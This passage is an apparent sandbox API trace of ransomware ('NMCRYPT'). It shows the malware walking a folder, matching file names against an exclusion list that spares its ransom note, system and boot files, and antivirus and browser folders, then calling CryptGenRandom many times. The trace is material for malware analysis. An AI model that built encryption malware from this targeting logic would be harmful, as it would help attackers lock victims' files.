lpFindFileData=0x2d7f25c | out: lpFindFileData=0x2d7f25c) returned 0x9ad1f8 [0170.459] wcscmp (_String1=".", _String2=".") returned 0 [0170.459] FindNextFileW (in: hFindFile=0x9ad1f8, lpFindFileData=0x2d7f25c | out: lpFindFileData=0x2d7f25c) returned 1 [0170.459] wcscmp (_String1="..", _String2=".") returned 1 [0170.459] wcscmp (_String1="..", _String2="..") returned 0 [0170.459] FindNextFileW (in: hFindFile=0x9ad1f8, lpFindFileData=0x2d7f25c | out: lpFindFileData=0x2d7f25c) returned 1 [0170.459] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*NMCRYPT") returned 0 [0170.459] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*Recovers your files.html") returned 0 [0170.459] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*.exe") returned 0 [0170.459] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*.dll") returned 0 [0170.459] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*.lnk") returned 0 [0170.459] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*.bat") returned 0 [0170.459] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*.ini") returned 0 [0170.459] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*.msi") returned 0 [0170.459] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*.scf") returned 0 [0170.459] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*pagefile.sys*") returned 0 [0170.459] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*NTUSER.DAT*") returned 0 [0170.459] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*AppData*") returned 0 [0170.459] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*\\winrar\\*") returned 0 [0170.459] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0170.459] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*\\java\\*") returned 0 [0170.459] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0170.459] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*\\windows\\*") returned 0 [0170.459] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*\\ESET\\*") returned 0 [0170.459] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*\\AVG\\*") returned 0 [0170.459] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*\\AVIRA\\*") returned 0 [0170.459] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0170.460] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*Atheros*") returned 0 [0170.460] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*Realtek*") returned 0 [0170.460] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*bootmgr*") returned 0 [0170.460] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*boot*") returned 0 [0170.460] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*boot*") returned 0 [0170.460] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*CONFIG.SYS*") returned 0 [0170.460] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*IO.SYS*") returned 0 [0170.460] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*MSDOS.SYS*") returned 0 [0170.460] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*NTDETECT.COM*") returned 0 [0170.460] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*ntldr*") returned 0 [0170.460] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*chrome*") returned 0 [0170.460] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*opera*") returned 0 [0170.460] PathMatchSpecW (pszFile="AppXManifest.xml", pszSpec="*firefox*") returned 0 [0170.460] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\AppXManifest.xml", pszSpec="*") returned 1 [0170.460] strlen (_Str="NMoreira") returned 0x8 [0170.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: 